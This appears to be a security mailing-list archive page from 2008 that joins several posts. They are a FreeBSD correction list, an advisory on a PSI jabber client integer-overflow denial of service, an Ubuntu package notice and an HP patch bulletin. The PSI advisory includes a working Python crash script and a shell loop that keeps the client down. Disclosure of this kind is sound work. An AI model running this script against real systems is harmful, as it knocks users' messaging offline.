http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. CVS: Branch Revision Path - - RELENG_6 src/sys/kern/uipc_domain.c 1.44.2.4 RELENG_6_4 src/UPDATING 1.416.2.40.2.4 src/sys/conf/newvers.sh 1.69.2.18.2.7 src/sys/kern/uipc_domain.c 1.44.2.3.6.2 RELENG_6_3 src/UPDATING1.416.2.37.2.12 src/sys/conf/newvers.sh 1.69.2.15.2.11 src/sys/kern/uipc_domain.c 1.44.2.3.4.1 RELENG_7 src/sys/kern/uipc_domain.c 1.51.2.2 RELENG_7_1 src/UPDATING 1.507.2.13.2.2 src/sys/kern/uipc_domain.c 1.51.2.1.2.2 RELENG_7_0 src/UPDATING 1.507.2.3.2.11 src/sys/conf/newvers.sh 1.72.2.5.2.11 src/sys/kern/uipc_domain.c 1.51.4.1 - - Subversion: Branch/path Revision - - stable/6/ r186405 releng/6.4/ r186405 releng/6.3/ r186405 stable/7/
[ISecAuditors Security Advisories] PSI remote integer overflow DoS
=
INTERNET SECURITY AUDITORS ALERT 2008-004
- Original release date: 12th December, 2008
- Last revised: 22nd December, 2008
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
=
I. VULNERABILITY
-
PSI remote integer overflow DoS
II. BACKGROUND
-
PSI is a widely used jabber client Qt4 based, available for Windows,
Mac, linux, and other operative systems.
III. DESCRIPTION
-
In order doing file transfers, a open port is needed (by default is
8010/tcp)
If first byte of data stream is a 0x05, it means socks5 option and we
enter in the vulnerable zone of the code.
Is possible to satisfy the jump: cmp al, 5 -> je vulnCheck()
The second byte is the amount of bytes to memcpy, but there is a check:
cmp ecx, 10 -> jg goHome()
Well the signed comparison lets us to send negative values, the
acepted range are <= 10 and > 0x7f (it shoud be compared as unsigned)
then the check can be bypased with this int overflow, now we can play
with 0x80 - 0xff range, and the rest of the stream.
By now we pass successfully the QByteArray.Resize() and
QByteArray.Realloc()
And arrive to the memcpy, from all the data stream sended, n bytes
will be copied, n is controlled by us :)
The problem to make a heap overflow, is that the destiny variable will
be resized to n. Then is possible to hangup the process or also the
system with these two ways
1. Can send a only two bytes buffer \x05\xff then the memcpy's rep
movz will access to non paged source, becouse we don't sent the bytes
we are saying to copy.
2. Can be sended a very large buffer and firce a large copy of memory.
The system can be saturated.
IV. PROOF OF CONCEPT
-
#!/usr/bin/python
#by sha0 remote integer overflow DoS (Linux && windows)
#http://jolmos.blogspot.com
import socket, sys
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
sock.connect((sys.argv[1],8010))
except:
print 'Cannot connect!'
sys.exit(1)
try:
sock.send('\x05\xff')
print 'Crashed!'
except:
print 'Cannot send!'
sock.close()
#eof
The process can be crashed remotelly by:
./PSIcoKiller.py
PSI down forever:
while [ 1 ]; do ./PSIcoKiller.py ;done
V. BUSINESS IMPACT
-
Remote/local Denial of Service of the communications.
VI. SYSTEMS AFFECTED
-
PSI 0.11, 0.12 and 0.13 (last)
PSI 0.10 not affected
PSI 0.12.1 Solves the problem
Tested in Linux and Windows, but may crash other heap implementations.
VII. SOLUTION
-
PSI 0.12.1 solves the problem, nevertheless i suggest filter this port
whenever possible.
Thanks to kev and infinity for their quick response.
VIII. REFERENCES
-
http://psi-im.org
IX. CREDITS
-
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
X. REVISION HISTORY
-
December 12, 2008: Initial release
December 17, 2008: update the new that 0.12.1 solves the problem.
XI. DISCLOSURE TIMELINE
-
November 20, 2008: Vulnerability acquired by
Internet Security Auditors
December 02, 2008: Vendor notification
December 12, 2008: Advisory documentation
December 18, 2008: Vendor Release 0.12.1
December 23, 2008: Published
XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
[USN-677-2] OpenOffice.org Internationalization update
=== Ubuntu Security Notice USN-677-2 December 23, 2008 openoffice.org-l10n update https://launchpad.net/bugs/310359 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: openoffice.org-l10n-af 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ar 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-as-in 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-be-by 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-bg 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-bn 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-br 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-bs 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ca 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-common 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-cs 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-cy 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-da 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-de 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-dz 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-el 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-en-gb 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-en-za 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-eo 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-es 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-et 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-eu 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-fa 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-fi 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-fr 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ga 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-gl 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-gu-in 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-he 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-hi-in 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-hr 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-hu 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-it 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ja 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ka 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-km 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-kn 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ko 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ku 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-lo 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-lt 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-lv 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-mk 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ml-in 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-mr-in 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-nb 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ne 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-nl 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-nn 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-nr 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ns 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-or-in 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-pa-in 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-pl 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-pt 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-pt-br 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ro 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ru 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-rw 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-sk 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-sl 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-sr 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ss 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-st 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-sv 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-sw 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ta-in 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-te-in 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-tg 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-th 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ti-er 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-tn 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-tr 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ts 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-uk 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ur-in 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-uz 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-ve 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-vi 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-xh 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-zh-cn 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-zh-tw 1:2.4.1-1ubuntu2.1 openoffice.org-l10n-zu 1:2.4.1-1ubuntu2.1 In general, a standard system upgrade is sufficient to effect the necessary changes
Re: rPSA-2008-0341-1 dovecot
What Dovecot version prior?
[security bulletin] HPSBST02397 SSRT080187 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-078
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01634640 Version: 1 HPSBST02397 SSRT080187 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-078 NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-12-22 Last Updated: 2008-12-22 Potential Security Impact: Please check the table below Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Various potential security vulnerabilities have been identified in Microsoft software that is running on the Storage Management Appliance (SMA). Some of these vulnerabilities may be pertinent to the SMA, please check the table in the Resolution section of this Security Bulletin. References: MS08-078 (CVE-2008-4844) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Storage Management Appliance v2.1 Software running on: Storage Management Appliance I Storage Management Appliance II Storage Management Appliance III BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score --Not Applicable-- === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. Patches released by Microsoft after MS06-051 are covered by monthly Security Bulletins. For the full archived list of Microsoft security updates applicable for Storage Management Appliance software v2.1, please refer to the following Security Bulletins available on the IT Resource Center (ITRC) Web site: http://www.itrc.hp.com/service/cki/secBullArchive.do For patches released by Microsoft in 2003, MS03-001 to MS03-051 refer to Security Bulletin HPSBST02146 For patches released by Microsoft in 2004, MS04-001 to MS04-045 refer to Security Bulletin HPSBST02147 For patches released by Microsoft in 2005, MS05-001 to MS05-055 refer to Security Bulletin HPSBST02148 For patches released by Microsoft in 2006, MS06-001 to MS06-051 refer to Security Bulletin HPSBST02140 The Microsoft patch index archive and further details about all Microsoft patches can be found on the following Web site: http://www.microsoft.com/technet/security/bulletin/summary.mspx Note: The SMA must have all pertinent SMA Service Packs applied Windows 2000 Update Rollup 1 Customers are advised to download and install the Windows 2000 Update Rollup 1 for Service Pack 4 on SMA v2.1. For more information please refer to the Windows 2000 Update Rollup 1 for Service Pack 4 and Storage Management Appliance v2.1 advisory at the following website: http://h2.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?contentType=SupportManual&lang=en&cc=us&docIndexId=179111&taskId=101&prodTypeId=12169&prodSeriesId=315667 Windows 2000 Update Rollup 1 for SP4 does not include security updates released after April 30, 2005 starting from MS05-026. It also does not include patches MS04-003 and MS04-028. Please install these patches in addition to Windows 2000 Update Rollup 1 for SP4, if they have not been installed already RESOLUTION HP strongly recommends the immediate installation of all security patches that apply to third party software which is integrated with SMA software products supplied by HP, and that patches are applied in accordance with an appropriate patch management policy. Note: Patch installation instructions are shown at the end of this table. - MS Patch - MS08-078 Security Update for Internet Explorer (960714) Analysis - Possible security issue exists. Patch will run successfully. Action - For SMA v2.1, customers should download patch from Microsoft and install: Internet Explorer 6 SP1 Or Internet Explorer 5.01 SP4 To determine your IE version check the IE help page. - Installation Instructions: (if applicable) Download patches to a system other than the SMA Copy the patch to a floppy diskette or to a CD Execute the patch by using Terminal Services to the SMA or by attaching a keyboard, monitor and mouse to the SMA. Note: The Microsoft Windows Installer 3.1 is supported on SMA v2.1. For more information please refer at the following website: http://www.microsoft.com/downloads/details.aspx?FamilyID=889482fc-5f56-4a38-b838-de776fd4138c&hash=SYSSXDF&displaylang=en PRODUCT SPECIFIC INFORMATION None HISTORY Version:1 (rev.1) - 22 December 2008 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with
